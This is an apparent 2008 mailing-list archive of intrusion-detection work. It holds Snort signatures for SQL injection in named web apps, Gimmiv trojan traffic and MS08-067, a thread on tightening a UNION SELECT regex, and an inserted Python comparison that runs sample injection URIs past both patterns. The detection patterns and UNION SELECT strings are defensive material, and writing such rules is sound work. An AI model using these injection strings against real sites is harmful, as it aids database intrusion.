alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ShopMaker product.php id Parameter Remote SQL Injection"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/product.php?id="; nocase; uricontent:"UNION"; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,www.milw0rm.com/exploits/6799; reference:bugtraq,31854; sid:8519; rev:1;)

3. Bahar Download Script aspkat.asp SQL Injection

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Bahar Download Script aspkat.asp SQL Injection"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/aspkat.asp?kid="; nocase; uricontent:"UNION"; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:bugtraq,31852; sid:8520; rev:1;)

4. WordPress Newsletter Plugin newsletter Parameter SQL Injection

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WordPress Newsletter Plugin newsletter Parameter SQL Injection"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/st_newsletter/stnl_iframe.php"; nocase; uricontent:"?newsletter="; nocase; uricontent:"UNION"; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/6777; reference:url,secunia.com/advisories/32336; sid:8521; rev:1;)

Looking forward for your comments if any...

Thanks & Regards,
StillSecure

-------------- next part --------------
An HTML attachment was scrubbed...
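An added example, the editor's rather than StillSecure's or Emerging Threats' code: all four rules above end in `pcre:"/UNION.+SELECT/Ui"` guarded by `uricontent:"UNION"`, and the tighter `UNION\s+SELECT` form that Matt substitutes when committing them is argued for further down the thread. The Python below runs both patterns over constructed URIs for the `/contact.php?id=` rule the way the rule evaluates them, cheap substring checks on the normalized URI first and the regex only if those pass, and counts how often the regex actually runs. The sample URIs, the `path` default and the `evaluate`/`summarize` names are the example's own; normalization is `%XX` decoding only, a stand-in for http_inspect.

```python
"""Editor's example, not StillSecure or Emerging Threats code: compares
pcre:"/UNION.+SELECT/Ui" as posted with the tighter UNION\\s+SELECT form,
over constructed URIs, with the uricontent pre-checks in front of the
regex in the same order the rule lists them."""
import re
from urllib.parse import unquote

LOOSE = re.compile(r'UNION.+SELECT', re.I)   # as posted
TIGHT = re.compile(r'UNION\s+SELECT', re.I)  # the form committed instead

# Constructed request URIs for the /contact.php rule, before normalization.
SAMPLES = {
    'classic':    '/contact.php?id=-1%20UNION%20SELECT%201,2,3,4--',
    'newline':    '/contact.php?id=-1%0aUNION%0aSELECT%201,2,3,4--',
    'benign':     '/contact.php?id=union%20square%20select%20board',
    'comment':    '/contact.php?id=-1%20UNION/**/SELECT%201,2,3,4--',
    'no_union':   '/contact.php?id=42',
    'other_page': '/product.php?id=-1%20UNION%20SELECT%201--',
}

def normalize(uri):
    """Stand-in for http_inspect's normalized URI buffer: percent-decode only."""
    return unquote(uri)

def evaluate(uri, path='/contact.php?id='):
    """Mirror the rule's option order: the two uricontent checks (case-
    insensitive substring tests) first, the pcre only if both pass.
    Returns (loose_hit, tight_hit, pcre_ran)."""
    u = normalize(uri)
    low = u.lower()
    if path not in low or 'union' not in low:
        return (False, False, False)          # pcre never invoked
    return (bool(LOOSE.search(u)), bool(TIGHT.search(u)), True)

def summarize(samples=SAMPLES):
    """Per-sample results plus how many times the regex was actually run."""
    results = {name: evaluate(uri) for name, uri in samples.items()}
    regex_runs = sum(1 for r in results.values() if r[2])
    return results, regex_runs

if __name__ == '__main__':
    results, runs = summarize()
    for name, (loose, tight, _) in results.items():
        print(f'{name:11s} loose={loose!s:5} tight={tight!s:5}')
    print('regex invoked', runs, 'of', len(SAMPLES))
```

Two of the samples are worth a look beyond the obvious ones. `benign` (`union square select board`) is the false positive Robert Kerr is worried about: `.+` happily spans "square", `\s+` does not. `newline` cuts the other way: without the `s` modifier a dot does not match a newline, so the loose form misses a `%0a`-separated payload that `\s+` catches. `comment` shows the cost of tightening: `UNION/**/SELECT` slips past `\s+` while `.+` still catches it, so the choice is a trade-off rather than a pure improvement. `no_union` and `other_page` never reach the regex at all, which is the point of the `uricontent` pre-checks.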
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081024/a3243204/attachment-0001.html From jonkman at jonkmans.com Fri Oct 24 09:15:30 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Fri, 24 Oct 2008 09:15:30 -0400 Subject: [Emerging-Sigs] Gimmiv.A.dll Infection Sig In-Reply-To: <637078af0810232125vcac0298j102120cc10878fd1@mail.gmail.com> References: <789A6CF2A624E54184956F80CCCAE8600143FA14@CPWP016I.ercot.com> <49010F2A.6020802@jonkmans.com> <637078af0810232125vcac0298j102120cc10878fd1@mail.gmail.com> Message-ID: <4901CA72.1050005@jonkmans.com> I've updated to reflect that, thanks dxp. Matt dxp wrote: > Looking at other Gimmiv threatexpert reports it appears that > "/test2.php" is not static, the number varies. So far it looks like a > single digit integer, so perhaps a pattern match for something like > "/test[0-9].php" would be better. > -- > dxp > > On Thu, Oct 23, 2008 at 7:56 PM, Matt Jonkman > wrote: > > Done deal, posted! > > Thanks Michael > > Matt > > Sconzo, Michael wrote: > > I've got no good reason other then that's what I came up with > originally > > in a quick-n-dirty fashion. :) > > > > It's probably better to switch to uricontent. > > > > -=Mike > > > > -----Original Message----- > > From: Matt Jonkman [mailto:jonkman at jonkmans.com > ] > > Sent: Thursday, October 23, 2008 6:49 PM > > To: Sconzo, Michael > > Cc: Emerging Threats Signatures > > Subject: Re: [Emerging-Sigs] Gimmiv.A.dll Infection Sig > > > > Hi Michael. Posting now sorry for the delay. Any reason not to go > > uricontent on these? > > > > matt > > > > Sconzo, Michael wrote: > >> I've gotten a couple of pings about this. Here's some more info: > >> http://www.virustotal.com/analisis/aa0b4951ba47a5780a4fe9d0fdf6d521 > >> > >> Check out the threat expert link at the bottom for some analysis of > > the > >> software. 
> >> > >> -=Mike > >> > >> -----Original Message----- > >> From: emerging-sigs-bounces at emergingthreats.net > > >> [mailto:emerging-sigs-bounces at emergingthreats.net > ] On Behalf Of > > Sconzo, > >> Michael > >> Sent: Thursday, October 23, 2008 4:58 PM > >> To: Emerging Threats Signatures > >> Subject: Re: [Emerging-Sigs] Gimmiv.A.dll Infection Sig > >> > >> Need to remove the depth 11: > >> > >> alert tcp $INTERNAL_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET > >> Gimmiv.A.dll Infection"; flow: to_server,established; > >> content:"test2.php"; nocase; content:"abc="; nocase; content:"def="; > >> nocase; classtype: trojan-activity; sid: 0000000; rev:2;) > >> > >> -----Original Message----- > >> From: emerging-sigs-bounces at emergingthreats.net > > >> [mailto:emerging-sigs-bounces at emergingthreats.net > ] On Behalf Of > > Sconzo, > >> Michael > >> Sent: Thursday, October 23, 2008 4:55 PM > >> To: Emerging Threats Signatures > >> Subject: [Emerging-Sigs] Gimmiv.A.dll Infection Sig > >> > >> Haven't had a good chance to test this, but it seems like it will > > catch > >> at least > >> > > > http://www.microsoft.com/security/portal/Entry.aspx?name=TrojanSpy%3aWin > >> 32%2fGimmiv.A.dll infected hosts. It's a bit late at that time, but > > you > >> can at least get a handle on any infected machines. > >> > >> Just needs a real sid in the sig. > >> > >> > >> alert tcp $INTERNAL_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET > >> Gimmiv.A.dll Infection"; flow: to_server,established; > >> content:"test2.php"; nocase; content:"abc="; nocase; content:"def="; > >> nocase; depth: 11; classtype: trojan-activity; sid: 0000000; rev:1;) > >> > >> I could be off-base on this one, if so sorry for the noise. 
> >>
> >> -=Mike
> >>
> >> ---
> >> Mike Sconzo
> >> ERCOT Security Operations
> >>
> >> _______________________________________________
> >> Emerging-sigs mailing list
> >> Emerging-sigs at emergingthreats.net
> >> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> >
>
> --
> --------------------------------------------
> Matthew Jonkman
> Emerging Threats
> Phone 765-429-0398
> Fax 312-264-0205
> http://www.emergingthreats.net
> --------------------------------------------
>
> PGP: http://www.jonkmans.com/mattjonkman.asc
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
> ------------------------------------------------------------------------
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------
PGP: http://www.jonkmans.com/mattjonkman.asc


From jonkman at jonkmans.com Fri Oct 24 10:54:18 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Fri, 24 Oct 2008 10:54:18 -0400
Subject: [Emerging-Sigs] MS08-067
Message-ID: <4901E19A.7050203@jonkmans.com>

I had a mistake in 4 of the original sigs. I had put in a decimal ascii for "/" versus the hex. Read the wrong column. :)

Just fixed and pushed, I recommend updating asap!

Thanks to those that pointed out my mistake!!

Matt

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------
PGP: http://www.jonkmans.com/mattjonkman.asc


From jonkman at jonkmans.com Fri Oct 24 11:30:23 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Fri, 24 Oct 2008 11:30:23 -0400
Subject: [Emerging-Sigs] StillSecure: 6 New Signatures - Oct-22-2008
In-Reply-To: <1224707070.15370.24.camel@clarity.local.home>
References: <5C9E8CCEEB81ED498AC0C3B0054704F3054C290D@webmail.latis.com> <1224707070.15370.24.camel@clarity.local.home>
Message-ID: <4901EA0F.9040005@jonkmans.com>

Robert Kerr wrote:
> Can we have a discussion on the merits of pcre:"/UNION.+SELECT/Ui"; as
> appears in many of these rules. Two concerns:
>
> a) PCREs are slow and should always be well anchored. Would make
> sense to precede each pcre with a uricontent:"UNION"; to prevent the
> pcre firing on every hit to pages which are otherwise legit

Ya, agreed there. I can modify these last few that we didn't have that.

>
> b) The .+ seems overly permissive in that it allows 1 or more of any
> character in between the union and select. A quick look at other rules
> of these type seems to suggest they use UNION\s+SELECT

I can't think of a character in between other than a space (after it's been normalized) that'd be valid. The real url would have a %20 likely, but that'll normalize to a space.

Will modify these recent ones as well to reflect. Are there others I need to look at as well?
Matt

>
> Compare for example this rule:
>
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB Cacti SQL Injection Vulnerability graph_view graph_list UNION SELECT"; flow:established,to_server; uricontent:"graph_view.php?"; nocase; uricontent:"graph_list="; nocase; uricontent:"UNION"; nocase; pcre:"/.+UNION\s+SELECT/Ui"; classtype:web-application-attack; reference:cve,CVE-2008-0785; reference:bugtraq,27749; sid:2007889; rev:2;)
>
> Not having looked deeply at any of the bugs concerned it may be possible
> there's something odd going on that makes \s+ not suitable?
>

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------
PGP: http://www.jonkmans.com/mattjonkman.asc


From jonkman at jonkmans.com Fri Oct 24 11:41:56 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Fri, 24 Oct 2008 11:41:56 -0400
Subject: [Emerging-Sigs] StillSecure: 4 New Signatures - Oct-24-2008
In-Reply-To: <5C9E8CCEEB81ED498AC0C3B0054704F3054C290E@webmail.latis.com>
References: <5C9E8CCEEB81ED498AC0C3B0054704F3054C290E@webmail.latis.com>
Message-ID: <4901ECC4.7080307@jonkmans.com>

Added as well. I changed the pcre x+ to a \s+

Thanks!!

Matt

signatures wrote:
> Hi Matt,
>
> Please find 4 New Signatures below:
>
> 1. Simple Customer contact.php SQL injection
>
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Simple Customer contact.php SQL injection"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/contact.php?id="; nocase; uricontent:"UNION"; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:bugtraq,28852; sid:8518; rev:1;)
>
> 2. ShopMaker product.php id Parameter Remote SQL Injection
>
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ShopMaker product.php id Parameter Remote SQL Injection"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/product.php?id="; nocase; uricontent:"UNION"; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,www.milw0rm.com/exploits/6799; reference:bugtraq,31854; sid:8519; rev:1;)
>
> 3. Bahar Download Script aspkat.asp SQL Injection
>
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Bahar Download Script aspkat.asp SQL Injection"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/aspkat.asp?kid="; nocase; uricontent:"UNION"; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:bugtraq,31852; sid:8520; rev:1;)
>
> 4. WordPress Newsletter Plugin newsletter Parameter SQL Injection
>
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WordPress Newsletter Plugin newsletter Parameter SQL Injection"; flow:to_server,established; content:"GET "; depth:4; uricontent:"/st_newsletter/stnl_iframe.php"; nocase; uricontent:"?newsletter="; nocase; uricontent:"UNION"; nocase; pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; reference:url,milw0rm.com/exploits/6777; reference:url,secunia.com/advisories/32336; sid:8521; rev:1;)
>
> Looking forward for your comments if any...
>
> Thanks & Regards,
> StillSecure
>
> ------------------------------------------------------------------------
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------
PGP: http://www.jonkmans.com/mattjonkman.asc


From jonkman at jonkmans.com Fri Oct 24 14:42:26 2008
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Fri, 24 Oct 2008 14:42:26 -0400
Subject: [Emerging-Sigs] Gimiv Pings
Message-ID: <49021712.7090207@jonkmans.com>

alert icmp $HOME_NET any -> $EXTERNAL_NET any (msg:"ET TROJAN Gimiv Infection Ping Outbound"; icode:0; itype:8; dsize:20; content:"abcde12345fghij6789"; classtype:trojan-activity; sid:2008726; rev:1;)

Caught the Gimiv samples in the sandnet making an outbound ping to two google IPs. They must be hardcoded as it does not look them up. But the payload is unique, as seen above.

This sig is posted, and I'll put up one for inbound pings, just in case it uses that to start ping sweeps.
Matt

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------
PGP: http://www.jonkmans.com/mattjonkman.asc


From emerging at emergingthreats.net Fri Oct 24 16:00:08 2008
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Fri, 24 Oct 2008 16:00:08 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20081024200008.D229E45026@goliath.jonkmans.com>

[***] Results from Oinkmaster started Fri Oct 24 16:00:08 2008 [***]

[+++] Added rules: [+++]

2008689 - ET TROJAN Gimmiv.A.dll Infection (emerging-virus.rules)
2008690 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (1) (emerging-exploit.rules)
2008691 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (2) (emerging-exploit.rules)
2008692 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (3) (emerging-exploit.rules)
2008693 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (4) (emerging-exploit.rules)
2008694 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (5) (emerging-exploit.rules)
2008695 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (6) (emerging-exploit.rules)
2008696 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (7) (emerging-exploit.rules)
2008697 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (8) (emerging-exploit.rules)
2008698 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (9) (emerging-exploit.rules)
2008699 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (10) (emerging-exploit.rules)
2008700 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 - Known Exploit Instance (emerging-exploit.rules)
2008701 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (11) (emerging-exploit.rules)
2008702 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (12) (emerging-exploit.rules)
2008703 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (13) (emerging-exploit.rules)
2008704 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (14) (emerging-exploit.rules)
2008705 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (15) (emerging-exploit.rules)
2008706 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (16) (emerging-exploit.rules)
2008707 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (17) (emerging-exploit.rules)
2008708 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (18) (emerging-exploit.rules)
2008709 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (19) (emerging-exploit.rules)
2008710 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (20) (emerging-exploit.rules)
2008711 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (21) (emerging-exploit.rules)
2008712 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (22) (emerging-exploit.rules)
2008713 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (23) (emerging-exploit.rules)
2008714 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (24) (emerging-exploit.rules)
2008715 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (25) (emerging-exploit.rules)
2008716 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (26) (emerging-exploit.rules)
2008717 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (27) (emerging-exploit.rules)
2008718 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (28) (emerging-exploit.rules)
2008719 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (29) (emerging-exploit.rules)
2008720 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (30) (emerging-exploit.rules)
2008721 - ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 - Known Exploit Instance (2) (emerging-exploit.rules)
2008722 - ET WEB_SPECIFIC Simple Customer contact.php SQL injection (emerging-web_sql_injection.rules)
2008723 - ET WEB_SPECIFIC ShopMaker product.php id Parameter Remote SQL Injection (emerging-web_sql_injection.rules)
2008724 - ET WEB_SPECIFIC Bahar Download Script aspkat.asp SQL Injection (emerging-web_sql_injection.rules)
2008725 - ET WEB_SPECIFIC WordPress Newsletter Plugin newsletter Parameter SQL Injection (emerging-web_sql_injection.rules)
2008726 - ET TROJAN Gimmiv Infection Ping Outbound (emerging-virus.rules)
2008727 - ET TROJAN Gimmiv Infection Ping Inbound (emerging-virus.rules)

[///] Modified active rules: [///]

2008668 - ET WEB_SPECIFIC myEvent viewevent.php SQL Injection (emerging-web_sql_injection.rules)
2008669 - ET WEB_SPECIFIC AstroSPACES profile.php SQL Injection (emerging-web_sql_injection.rules)
2008670 - ET WEB_SPECIFIC SweetCMS page SQL Injection (emerging-web_sql_injection.rules)
2008672 - ET WEB_SPECIFIC My PHP Dating id parameter SQL Injection (emerging-web_sql_injection.rules)
2008673 - ET EXPLOIT Microsoft PicturePusher ActiveX Cross Site File Upload Attack (emerging-exploit.rules)
2008681 - ET MALWARE iframebiz - /qwertyuiyw12ertyuytre/adv***.php (emerging-malware.rules)
2008688 - ET WEB_SPECIFIC XOOPS Makale Module id SQL Injection (emerging-web_sql_injection.rules)

[+++] Added non-rule lines: [+++]

-> Added to emerging-exploit.rules (1):
#by Secureworks

-> Added to emerging-sid-msg.map (42):
2008681 || ET MALWARE iframebiz - /qwertyuiyw12ertyuytre/adv***.php || url,www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_DLOADR.QC&VSect=T || url,iframecash.biz
2008689 || ET TROJAN Gimmiv.A.dll Infection || url,www.microsoft.com/security/portal/Entry.aspx?name=TrojanSpy%3aWin32%2fGimmiv.A
2008690 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (1) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
2008691 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (2) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
2008692 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (3) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
2008693 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (4) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
2008694 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (5) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
2008695 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (6) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
2008696 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (7) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
2008697 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (8) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
2008698 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (9) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
2008699 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (10) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
2008700 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 - Known Exploit Instance || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
2008701 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (11) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
2008702 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (12) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
2008703 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (13) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
2008704 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (14) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
2008705 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (15) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
2008706 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (16) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
2008707 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (17) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
2008708 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (18) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
2008709 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (19) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
2008710 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (20) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
2008711 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (21) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
2008712 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (22) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
2008713 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (23) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
2008714 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (24) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
2008715 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (25) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
2008716 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (26) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
2008717 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (27) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
2008718 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067
(28) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008719 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (29) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008720 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (30) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008721 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 - Known Exploit Instance (2) || url,www.kb.cert.org/vuls/id/827267 || cve,2008-4250 || url,www.microsoft.com/technet/security/Bulletin/MS08-067.mspx 2008722 || ET WEB_SPECIFIC Simple Customer contact.php SQL injection || bugtraq,28852 2008723 || ET WEB_SPECIFIC ShopMaker product.php id Parameter Remote SQL Injection || bugtraq,31854 || url,www.milw0rm.com/exploits/6799 2008724 || ET WEB_SPECIFIC Bahar Download Script aspkat.asp SQL Injection || bugtraq,31852 2008725 || ET WEB_SPECIFIC WordPress Newsletter Plugin newsletter Parameter SQL Injection || url,secunia.com/advisories/32336 || url,milw0rm.com/exploits/6777 2008726 || ET TROJAN Gimmiv Infection Ping Outbound 2008727 || ET TROJAN Gimmiv Infection Ping Inbound 2400008 || ET DROP Spamhaus DROP Listed Traffic Inbound || url,www.spamhaus.org/drop/drop.lasso 2401008 || ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE || url,www.spamhaus.org/drop/drop.lasso -> Added to emerging-sid-msg.map.txt (42): 2008681 || ET MALWARE iframebiz - /qwertyuiyw12ertyuytre/adv***.php || url,www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_DLOADR.QC&VSect=T || url,iframecash.biz 2008689 || ET TROJAN Gimmiv.A.dll Infection || url,www.microsoft.com/security/portal/Entry.aspx?name=TrojanSpy%3aWin32%2fGimmiv.A 2008690 || ET EXPLOIT Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (1) || 
